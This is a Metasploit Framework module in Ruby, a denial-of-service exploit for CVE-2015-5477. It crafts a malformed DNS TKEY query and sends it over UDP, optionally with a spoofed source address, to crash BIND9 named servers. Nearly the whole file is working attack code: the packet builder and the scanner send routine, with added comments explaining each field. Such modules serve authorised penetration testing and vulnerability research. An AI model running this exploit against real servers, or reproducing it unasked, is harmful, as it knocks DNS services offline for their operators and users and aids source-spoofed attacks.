GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/dns/bind_tkey.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
  # Auxiliary DoS module for CVE-2015-5477 (BIND9 'named' TKEY query handling).
  #
  # For each scanned host, #scan_host sends the single UDP datagram built by
  # #payload; no reply is read.  The mixins below supply the scanner plumbing
  # (scan_host dispatch, scanner_send / scanner_spoof_send, rport) — see the
  # mixin definitions for their exact contracts.
  include Msf::Exploit::Capture
  include Msf::Auxiliary::UDPScanner
  include Msf::Auxiliary::Dos

  # Registers module metadata and options.
  #
  # @param info [Hash] base module info, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'BIND TKEY Query Denial of Service',
        'Description' => %q{
          This module sends a malformed TKEY query, which exploits an
          error in handling TKEY queries on affected BIND9 'named' DNS servers.
          As a result, a vulnerable named server will exit with a REQUIRE
          assertion failure. This condition can be exploited in versions of BIND
          between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0
          through 9.10.2-P2.
        },
        'Author' => [
          'Jonathan Foote', # Original discoverer
          'throwawayokejxqbbif', # PoC
          'wvu' # Metasploit module
        ],
        'References' => [
          ['CVE', '2015-5477'],
          ['URL', 'http://web.archive.org/web/20190425014550/https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/'],
          ['URL', 'https://kb.isc.org/article/AA-01272']
        ],
        'DisclosureDate' => '2015-07-28',
        'License' => MSF_LICENSE,
        # Receive window of 0: presumably "send only, do not wait for replies",
        # since a server that hits the assertion exits — confirm against UDPScanner.
        'DefaultOptions' => { 'ScannerRecvWindow' => 0 },
        'Notes' => {
          # The target service is expected to go down (named exits, per the
          # description); this is not a recoverable side effect.
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    # RPORT defaults to DNS/53; SRC_ADDR is optional and, when set, switches
    # scan_host to the spoofed raw-send path.
    register_options([
      Opt::RPORT(53),
      OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])
    ])

    # Capture-related options that this module never reads; presumably
    # inherited from Msf::Exploit::Capture.
    deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
  end

  # Sends one payload datagram to +ip+ on rport.
  #
  # With SRC_ADDR set the packet is sent with a spoofed source address and no
  # status line is printed; otherwise it is sent from the local socket after
  # a status message.  The return value of the send helpers is not used.
  #
  # @param ip [String] target address supplied by the UDPScanner mixin
  def scan_host(ip)
    if datastore['SRC_ADDR']
      scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])
    else
      print_status("Sending packet to #{ip}")
      scanner_send(payload, ip, rport)
    end
  end

  # Builds the DNS query bytes: a 12-byte header, one question of type TKEY,
  # and one additional record of type TXT carrying random text.  The
  # mismatch between the TKEY question and the TXT additional record is
  # presumably what the description calls "malformed".
  #
  # A fresh random name/TXT/TTL is generated on every call, so the two
  # send paths in #scan_host never reuse the same bytes.  Fixed fields
  # (transaction ID 0x0000, QTYPE TKEY, an additional TXT record) are a
  # stable signature for detection on the wire.
  #
  # NOTE(review): the literals below mix bytes >= 0x80 ("\xf9") with
  # ASCII-8BIT output of Array#pack (the TTL).  Concatenating those with <<
  # relies on the module source being evaluated in a binary encoding;
  # under a UTF-8 source encoding Ruby may raise Encoding::CompatibilityError
  # — TODO confirm against the module loader.
  #
  # @return [String] raw DNS query datagram
  def payload
    # Random label and TXT payload, each 1..42 characters (assuming
    # rand_text_alphanumeric accepts a Range).  42 < 64, so the label length
    # always fits in one DNS label-length byte.
    name = Rex::Text.rand_text_alphanumeric(1..42)
    txt = Rex::Text.rand_text_alphanumeric(1..42)

    name_length = [name.length].pack('C')
    txt_length = [txt.length].pack('C')
    data_length = [txt.length + 1].pack('n') # RDLENGTH: TXT length byte + text
    ttl = [rand(2**31 - 1) + 1].pack('N') # random TTL in 1..2**31-1, big-endian

    # --- Header (12 bytes, six 16-bit big-endian fields) ---
    query = "\x00\x00" # Transaction ID: 0x0000
    query << "\x00\x00" # Flags: 0x0000 Standard query
    query << "\x00\x01" # Questions: 1
    query << "\x00\x00" # Answer RRs: 0
    query << "\x00\x00" # Authority RRs: 0
    query << "\x00\x01" # Additional RRs: 1

    # --- Question section: single-label name, QTYPE TKEY, QCLASS IN ---
    query << name_length # [Name Length]
    query << name # Name
    query << "\x00" # [End of name]
    query << "\x00\xf9" # Type: TKEY (Transaction Key) (249)
    query << "\x00\x01" # Class: IN (0x0001)

    # --- Additional section: same name, TXT record with random text ---
    query << name_length # [Name Length]
    query << name # Name
    query << "\x00" # [End of name]
    query << "\x00\x10" # Type: TXT (Text strings) (16)
    query << "\x00\x01" # Class: IN (0x0001)
    query << ttl # Time to live
    query << data_length # Data length
    query << txt_length # TXT Length
    query << txt # TXT
    # Implicit return: << returns the receiver, so the last line yields +query+.
  end
end